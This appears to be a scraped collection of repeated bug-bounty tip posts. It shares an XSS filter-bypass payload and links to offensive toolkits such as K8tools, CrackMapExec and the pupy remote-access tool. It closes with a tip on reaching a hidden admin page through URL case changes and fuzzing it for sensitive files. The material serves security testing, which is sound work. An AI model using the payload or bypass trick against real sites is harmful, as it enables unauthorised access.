[XSS] #BugBountyTips
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
#Pentest #bugbounty
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
GitHub
GitHub - k8gege/K8tools: K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/Ove…
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetN...
#bugbounty Tools
Scanners-Box
https://t.co/Kl8KyFqCtl
K8tools
https://t.co/Vc9Nm6AhLt
arachni
https://t.co/jyhK1yNlkH
Osmedeus
https://t.co/4maQSFojzs
Findsploit
https://t.co/kgO1lJfwRK
StaCoAn
https://t.co/er4opW1l5J
#bugbountytips
Scanners-Box
https://t.co/Kl8KyFqCtl
K8tools
https://t.co/Vc9Nm6AhLt
arachni
https://t.co/jyhK1yNlkH
Osmedeus
https://t.co/4maQSFojzs
Findsploit
https://t.co/kgO1lJfwRK
StaCoAn
https://t.co/er4opW1l5J
#bugbountytips
GitHub
We5ter/Scanners-Box
A powerful hacker toolkit collected more than 10 categories of open source scanners from Github - 安全行业从业者自研开源扫描器合辑 - We5ter/Scanners-Box
#pentest
https://github.com/jivoi/pentest
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
Red-Teaming-Toolkit
https://github.com/infosecn1nja/Red-Teaming-Toolkit
pwndb
https://github.com/davidtavarez/pwndb
pupy
https://github.com/n1nj4sec/pupy
Red-Team-Infrastructure-Wiki
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Cheatsheet-God
https://github.com/OlivierLaflamme/Cheatsheet-God
#bugbountytips
https://github.com/jivoi/pentest
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
Red-Teaming-Toolkit
https://github.com/infosecn1nja/Red-Teaming-Toolkit
pwndb
https://github.com/davidtavarez/pwndb
pupy
https://github.com/n1nj4sec/pupy
Red-Team-Infrastructure-Wiki
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Cheatsheet-God
https://github.com/OlivierLaflamme/Cheatsheet-God
#bugbountytips
GitHub
GitHub - jivoi/pentest: :no_entry: offsec batteries included
:no_entry: offsec batteries included. Contribute to jivoi/pentest development by creating an account on GitHub.
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty